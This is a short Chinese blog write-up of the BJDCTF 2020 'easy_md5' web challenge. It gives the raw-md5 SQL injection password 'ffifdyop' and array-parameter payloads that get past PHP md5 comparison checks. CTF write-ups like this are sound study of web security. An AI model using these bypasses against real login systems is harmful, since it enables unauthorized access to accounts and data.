BJDCTF 2020easy_md5 – 星雨の小破站

BJDCTF 2020easy_md5

2025-1-18 23:12

|

CTF,CTF-web,NSSCTF

|

72

114 字

|

2 分钟

本文最后更新于175 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20241209163306.png

Pasted image 20241209164044.png

1.F12一下
在返回的响应包里发现提示

select * from 'admin' where password=md5($pass,true)

Pasted image 20241209163211.png

2.代码审计

select * from 'admin' where password=md5($pass,true)

因为是登录框，并且对密码进行md5加密，这时想到md5万能密码

ffifdyop

3.输入ffifdyop
Pasted image 20241209164327.png

4.F12一下，发现提示
可以进行数组绕过
payload:

?a[]=1&b[]=2

Pasted image 20241209164411.png

5.发现又是数组绕过
payload:

param1[]=1&param2[]=2

Pasted image 20241209164621.png

Pasted image 20241209164858.png

总结

数组绕过md5强弱比较

文末附加内容

md5绕过弱比较数组绕过

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!